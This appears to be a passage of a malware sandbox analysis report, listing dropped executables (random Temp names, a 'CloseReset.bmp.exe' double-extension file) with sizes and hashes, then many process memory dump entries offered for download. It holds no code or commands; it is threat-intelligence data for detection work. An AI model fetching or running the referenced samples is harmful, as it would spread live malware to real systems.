5698f6412ccea1c2054d82f407a5f1c4

SHA1
81a49d9b794eb9401e266006560432fbdf34d98e

SHA256
388bd23e234fe67ce9a1e612c0a391f5693e5efee61ed4fb2f9b667d31c0ca22

SHA512
c10fe73614d47732fc44e44f175013f036b3f8ef77284cc4e75eaee1cbe572ea5a46fee2a6c4637105bb9355ee079bbdb31c6a1c4c916323cee0b2ccf83ce85f

Download Submit
C:\Users\Admin\AppData\Local\Temp\oEEY.exe

Filesize
506KB

MD5
46f14889ef82c48bf98254f962234bb8

SHA1
d3e63725f38430fd59d7667b23f0883082a09e55

SHA256
587963b63fcd177f8044af3f06bc43e99f526a8caa32a4cfb504b2eeda949ff6

SHA512
8a06b988192f490a3eefe5fcde965d6883d1087ce7145ff710057e0b60ae9a4950016529266f1c11d55d647f33e1f6567fb377b41f4628f13c30f3fed6e28fbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\oIEw.exe

Filesize
346KB

MD5
58248e5f4c887194a1d3f163fc028ba1

SHA1
26a1578a92db341a5e1de98382a9586a67db2020

SHA256
0ea9d080dbedc56155b2dd986233c8d1aa90c76842f006c03eacb5d95860371d

SHA512
745bb22f60018ffd5838976fdb7ccff0df5a687aee734486429f7a11bd5cda5f2f884da4192189ccaf9f3fa245366e6d58410b23c04eec79eb1f3e90936d4f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\oUIE.exe

Filesize
116KB

MD5
79d5492bea294b8cd647481943273e2e

SHA1
70fe512f5da72c7b9690c81f5f71a59a1a0a2c3b

SHA256
a5d4e2179c8dc20f4073b0d014d6063ecca5222f1251605d444cb4f3a8040c30

SHA512
4f9c1d015de31db900597cd700fb4774a8b58d1791b681526ed85447f4e7b4599f403a78dc8ca23e447a168cc4f38c681b7e98bb05a3f55f4c74e7bc8716ef63

Download Submit
C:\Users\Admin\AppData\Local\Temp\ogEo.exe

Filesize
237KB

MD5
63b8fe85c22f6dfc481f315901f30fab

SHA1
f86978ab30aa785832b1b7b3bf689e1f4c9802d8

SHA256
d0f008b55259afde7df145b1ebc99d256e9871aba0cd6d18c279a6065095fd30

SHA512
36ed1ed6151ac69c356989520b4f4c8c321ad597e7b64db02e6e0cfdd8526aa962ac13458f62a0b58bd367a11c67fd65a345c3ded4768bff0caa91d3e648d967

Download Submit
C:\Users\Admin\AppData\Local\Temp\osQK.exe

Filesize
111KB

MD5
ccf37baad7b708f9e0df411772530791

SHA1
f7f95ae5058c13a9174fccb6fd03bfcc77357de7

SHA256
54289e926231e9c606b6a676e36e448b5f2638d5dfacf3a39b608385f7812875

SHA512
a08d8f231100cfdf55fc3410a597df259e7cc41787c0203c54338f12b564f93683bb3360325f5cdf559ee616f11a300e680d8c15c8fe336848a848b8a3d94c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\qwMS.exe

Filesize
905KB

MD5
59e3f459527e4ae77f8dfd0f13bc2290

SHA1
b992a5a45b3cab1bcf8fcbbad80ca212e9f95e3a

SHA256
021f793df935448b9fd72bb376b7c8265b034be6d2865ea0c1bf4d6a8d3b5acd

SHA512
6367829924b8350a36446e8c33e62d72f92df13494a657808c23da263b84a85a5b398892002eff2c011ad53e8e3e18beac486056749fb92d1e8171f2b2efe5e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\sgsC.exe

Filesize
5.8MB

MD5
8d2f5fc35336943c54ece32e17c6b96e

SHA1
7843213097be0252497f9937ae37dc5e64ee9ac5

SHA256
3c89b8fadefae5190592e7e018dcf1797a959291eaa915d7ab3b1d81881a0e70

SHA512
27abe11d2756ea5ad9b022efe93c4a8c59802e058e93ae88012f1c582de52237218f15d1e75f31f5337c242bffa873ab268c8abaed28313b2cbdc69d50b67ef0

Download Submit
C:\Users\Admin\AppData\Local\Temp\uEAM.exe

Filesize
484KB

MD5
e0a267cc6dc69006285a41a07cd1504a

SHA1
d41a4ca3d0e4b4bb31882fe7d67ddee4cd274461

SHA256
4d5f272410270d09e1f40fb27fc53bf6fc21ba305b137dec2fc36b4093f2c45d

SHA512
f7edf3e51dc8e1278b25b6e634af81166c08b1c68ba7616bf44e7b1d32e621a7a02d8308e014025d2d9157b440f41f4de20f500432dab7e796819bbd638b34f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\uooG.exe

Filesize
488KB

MD5
8a21dca9caa71034a206c4f2904c2da9

SHA1
796ff620c968999a1751652ce9ee3c077ad56fe9

SHA256
3cdbb1a54f968e834a2feda2f0a0586181d85db2fa421d285dcd8790aa9afddd

SHA512
be154e8ebbe54a654d64816e13eab8e15ebf7cd7c5f16faf2b3a24ea7a312ca02e13251edfebd4ca01c50729edf33d0d989e1f10df7da31dee112bb32a30d22e

Download Submit
C:\Users\Admin\AppData\Local\Temp\uwMI.exe

Filesize
112KB

MD5
8ba9e529ae21edacf25ba28ed3d3c424

SHA1
8ed3c81070646f60edff7b51d0758ca27990f76f

SHA256
d171452fa65e546c3a700fe8ebe2d10397a24c7e27bd08a880806f9a9b39383f

SHA512
b90d7e60dd19faa6705559c730dcb03a1348e6907f76e0b2037b1e567ec1a75d18b74dc8d763ff7953275269f0f72405108f7f70b2ebcf3166f2bcd599a90e8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\wAYC.exe

Filesize
346KB

MD5
4bcfcae09dccc01c68d7d869e623135e

SHA1
c238b086926a1238ab4a830d38f050c8bcb3ba98

SHA256
506a02a5e8d385eb8a60671b4c4f89ec5f58641795deda5d5cca288897d1eeee

SHA512
02ac720756d0396b1c35ce86da96fcc95165ddc3ce243263efdd91657760bf85a05d616ee7caed3edb8ba85a494828738edfd3f1cf3868d7972ca761f7ad5e10

Download Submit
C:\Users\Admin\AppData\Local\Temp\wAYm.ico

Filesize
4KB

MD5
ace522945d3d0ff3b6d96abef56e1427

SHA1
d71140c9657fd1b0d6e4ab8484b6cfe544616201

SHA256
daa05353be57bb7c4de23a63af8aac3f0c45fba8c1b40acac53e33240fbc25cd

SHA512
8e9c55fa909ff0222024218ff334fd6f3115eccc05c7224f8c63aa9e6f765ff4e90c43f26a7d8855a8a3c9b4183bd9919cb854b448c4055e9b98acef1186d83e

Download Submit
C:\Users\Admin\AppData\Local\Temp\wAwQ.exe

Filesize
731KB

MD5
94d2098125aad9a7bd01b110e86d1e5c

SHA1
e800488ca082d952e9b2675ddf77cb02ae42ec10

SHA256
d759f9d83fd29f0796d48ccc4987bb479f8db0a58a025c1e8cf8de1a162c86d9

SHA512
9be0729a903386fe350ef7b7601d42fe82b73c0a4e6f09a4024ecde9421b8720b8d8e3c6a497eb72312183df30efeec93a9772b4486c05d3f6155f29051915a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\wMYe.exe

Filesize
118KB

MD5
56d134517ae4c2f54136146cc2ac4858

SHA1
f3c08c5322424aa1d7d6a1ec2430a8aa78c54dcb

SHA256
5a1e36c30d5b485d4bd3ab5354688c883b3f3709603ae123adca4d3879629886

SHA512
2e0181af76542e729f013beae7b8fe24c36790d895201a9e0f6a20080d317f9d0d55be4e6095ab765ca86ba86a0af0acaee4b98ba6ee76243b3e6fcea9a7a038

Download Submit
C:\Users\Admin\AppData\Local\Temp\wYMK.exe

Filesize
117KB

MD5
526202f945b5d0461fff19a83730323f

SHA1
69a208fa9ba2b0dd0888a4083367d7f546a5c51c

SHA256
6fffd6bedef7aeedc69e855a8b40cf2550257911597cdae28c2801ab50a80ec9

SHA512
7865e0ce7eaf8eca07f574025ec6d3ad41badb58c018b4c0e22e3165e4219342dce415c29687277f89c6a2c57810325cf9bf72e755ba8dd526c8b865663f80b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\wokU.exe

Filesize
1.1MB

MD5
6d398d623dff78182d22b79bcff4126e

SHA1
c8443733b814df02095dd8f3a6cf856356d9056d

SHA256
f28a8b33553ae6894472e7c730c51404e49360d0d2e75ba2b60a43771e95b522

SHA512
e86c3491ac869a26f8b5ff206be26e579c08b2bfe328cee1acaa46f4f72481fb904e0ea9f0f556ffd29011f93c17f9bcf2cc6edda1aede779f6ff5dc55b90df5

Download Submit
C:\Users\Admin\AppData\Local\Temp\yMMW.exe

Filesize
641KB

MD5
15fb441825bb52342fccc7fc678de318

SHA1
8a8347e822505169e56ba3f22a28839d8e09d490

SHA256
6acd6143ecff466ea425970aa6e531678e235b3434dfc6e3e025b0f09093559f

SHA512
f06ef7be4283f855e2ecb5ad94af7fb237acf497bf5059db0aa819891c123cbc749099f12b064a0fd0c072e3c8ad11fbed6a17b7ef3e1496d78327cce94723a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\yMQG.exe

Filesize
555KB

MD5
8420bdc6e6498214d6f9926763815367

SHA1
e281e02746c82726b5a89e78ea49723c027dd189

SHA256
e3fbea24a427d11ac8b6264830e180f55bdb74e7bbb95e0a906b0a8617295ce9

SHA512
b3ed8358bf47d7b42469d78926ef96fc1ed384785eece8a84add1b6ef4d65a3b9f50d94958cba5cbc2fe47e8e6960e136782af844607662e7aed1551a69596b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ykYs.exe

Filesize
118KB

MD5
5786f90282372fd29dee92f5d7637ff3

SHA1
eb4a6167214d68e4521c85891493453f4a855ddd

SHA256
d021e83487c9521a4e699a22859cab3b5a24ad24be74cd9464bbdf8028447baf

SHA512
2f4ca87465bf4b9f7e6a489ebce8227e9e587b3191678decb639e4c8036f4b16b46340a6535a5cecae6e50c6cc8614a241e0cde769ae9983d8070e90af743504

Download Submit
C:\Users\Admin\AppData\Local\Temp\yswW.exe

Filesize
110KB

MD5
5afb04c2b0ecd846e118b06124dcae7e

SHA1
cf405ee35d1f434ce80baf9fdb3179601f804643

SHA256
0a3b5c6ae08946fbdb40cba5153545bf3cb9eb43108db796c5c8e1dd0b662a83

SHA512
7b1c4091a65009d68759823cd0e222191af9f590687b02440ae77dfa35a8c718cd9bb48b7bfa0074b1247ebcca4f13f74e78c1b9d92ae66e5dfbd5312106381e

Download Submit
C:\Users\Admin\FwwcwswQ\CSkEQQUI.exe

Filesize
110KB

MD5
2f0eab73c965d9cc4d289f626200587f

SHA1
4f23d21fa84a9a67a46fc2683515ca2f61940d22

SHA256
6eb5c37be646b6e0c2566ee004b58f680ea22919b7b72722455d8bfef65bd0ee

SHA512
d5866f9e82c720a6f48a2f99dd065cb5d42347fd825a78b94aca7b0c85f68b741ba78a43dffaa27c3e8df40b72ee1cb265a62c494bcf93b3f3e87e2201b38057

Download Submit
C:\Users\Admin\Pictures\CloseReset.bmp.exe

Filesize
674KB

MD5
34093b2da00a9d60cff5fb03e03d646e

SHA1
67213db3181268a16be0aacd153c9da2963cdb3c

SHA256
675645f13adeaf3823a9258f70a4760b2773bdc39fb3c77aa13087f93a4cfdb6

SHA512
0f8eac9096b4b9306ded1115982ceaa16aa40a7d4b0e95ac8b6f2c3c3756edc29d8785373dcc74eda4d5441c0a86d85c70877f947d5df381151736a3293bd36e

Download Submit
memory/436-319-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/436-309-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/440-390-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/440-381-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/556-68-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/556-55-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/644-138-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/644-123-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/816-409-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/816-416-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/892-56-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/892-40-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/988-161-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/988-173-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1068-470-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1068-457-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1140-198-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1140-186-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1488-484-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1488-496-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1556-92-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1556-103-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1560-310-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1560-297-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1564-174-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1564-185-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1616-275-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1616-283-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1824-162-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1824-150-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1924-488-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1924-479-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2056-418-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2056-425-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2372-149-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2388-354-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2388-346-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2456-451-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2456-461-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2460-337-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2460-328-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2564-363-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2564-355-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2564-44-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2564-29-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2860-195-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2860-209-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2892-64-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2892-79-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2992-212-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2992-506-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2992-221-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2992-497-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3092-115-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3092-104-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3240-230-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3240-245-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3264-336-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3264-345-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3464-434-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3464-426-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3628-318-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3628-327-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3672-20-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3672-0-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3680-222-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3680-234-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3788-380-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3788-371-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4156-80-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4156-91-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4184-372-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4272-301-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4272-288-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4288-452-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4360-435-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4360-443-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4408-400-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4408-407-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4412-257-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4412-246-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4464-274-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4528-478-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4528-469-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4652-32-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4652-19-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4652-389-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4652-398-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4852-12-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/4996-292-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5012-127-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5032-505-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5032-514-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5080-258-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5080-266-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5084-14-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download